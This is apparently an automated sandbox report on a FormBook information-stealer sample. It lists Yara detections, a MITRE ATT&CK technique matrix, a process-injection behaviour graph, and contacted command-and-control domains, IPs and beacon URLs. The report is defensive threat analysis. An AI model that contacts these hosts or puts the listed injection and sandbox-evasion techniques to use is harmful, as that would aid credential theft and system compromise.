Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

(A number in parentheses after a technique is the count of triggered signatures mapped to it; techniques without a number were not observed.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (612) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (121) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (612) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (11) | LSA Secrets | System Network Configuration Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (4) | Cached Domain Credentials | System Network Connections Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (3) | DCSync | System Information Discovery (112) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

Behavior Graph ID: 452473 | Sample: NQBNpLezqZKv1P4.exe | Startdate: 22/07/2021 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.fbgroupsmadesimple.com; fbgroupsmadesimple.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 3 other signatures
  -> NQBNpLezqZKv1P4.exe 3 (started)
     Dropped file: C:\Users\user\...\NQBNpLezqZKv1P4.exe.log (ASCII)
     Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
     -> NQBNpLezqZKv1P4.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        -> explorer.exe (injected)
           DNS/IP: www.boicity.com 156.241.53.21, 49763, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; www.sh-zzjy.com 156.241.53.248, 49766, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; 7 other IPs or domains
           Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
           -> NETSTAT.EXE (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              -> cmd.exe 1 (started)
                 -> conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
NQBNpLezqZKv1P4.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.zhongyicts.com.cnue | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ct | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krbl | 0% | Avira URL Cloud | safe
http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.goodfont.co.krklJ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnUc | 0% | Avira URL Cloud | safe
http://www.carterandcone.comen | 0% | URL Reputation | safe
http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
www.extraclass.xyz/4nn8/ | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.carterandcone.comroa | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnAc | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.tiro.comicFf | 0% | Avira URL Cloud | safe
http://www.carterandcone.comR | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr.kr | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.carterandcone.como. | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://fontfabrik.comp | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.coml | 0% | Avira URL Cloud | safe
http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.goodfont.co.krylx | 0% | Avira URL Cloud | safe
http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.carterandcone.comTC | 0% | URL Reputation | safe
http://www.tiro.comicwf | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://fontfabrik.com( | 0% | Avira URL Cloud | safe
http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr8l | 0% | Avira URL Cloud | safe

          Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | 46.137.146.55 | true | true | | unknown
iafzal.com | 184.168.131.241 | true | true | | unknown
www.nirvananaturalcbd.net | 104.143.9.211 | true | true | | unknown
www.boicity.com | 156.241.53.21 | true | true | | unknown
www.zrcezzfdfkyjlir.com | 199.34.228.66 | true | true | | unknown
fbgroupsmadesimple.com | 184.168.131.241 | true | true | | unknown
www.sh-zzjy.com | 156.241.53.248 | true | true | | unknown
www.fbgroupsmadesimple.com | unknown | unknown | true | | unknown
www.iafzal.com | unknown | unknown | true | | unknown
www.updates-app.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.zrcezzfdfkyjlir.com/4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
http://www.iafzal.com/4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
www.extraclass.xyz/4nn8/ | true | Avira URL Cloud: safe | low
http://www.nirvananaturalcbd.net/4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
http://www.sh-zzjy.com/4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
http://www.fbgroupsmadesimple.com/4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
http://www.boicity.com/4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown
http://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.zhongyicts.com.cnue | NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/ct | NQBNpLezqZKv1P4.exe, 00000000.00000003.640649210.0000000005525000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.krbl | NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.krklJ | NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnUc | NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://api.twitter.com/1/direct_messages.xml?since_id= | NQBNpLezqZKv1P4.exe | false | | high
http://www.carterandcone.comen | NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.carterandcone.comroa | NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://twitter.com/statuses/user_timeline.xml?screen_name= | NQBNpLezqZKv1P4.exe | false | | high
http://www.carterandcone.com | NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp; NQBNpLezqZKv1P4.exe, 00000000.00000003.641993343.0000000005525000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnAc | NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp | false
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.tiro.comicFfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.comRNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.%s.comPAexplorer.exe, 00000005.00000000.702532502.0000000002B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.sandoll.co.kr.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fonts.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.carterandcone.como.NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.compNQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sajatypeworks.comlNQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.goodfont.co.krylxNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.comTCNQBNpLezqZKv1P4.exe, 00000000.00000003.641810889.0000000005525000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.tiro.comicwfNQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://050005.voodoo.com/js/partner.jsNETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.carterandcone.comlexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.founder.com.cn/cn/NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnNQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-user.htmlNQBNpLezqZKv1P4.exe, 00000000.00000003.645535031.000000000555E000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      high
                                                      https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpfalse
                                                        high
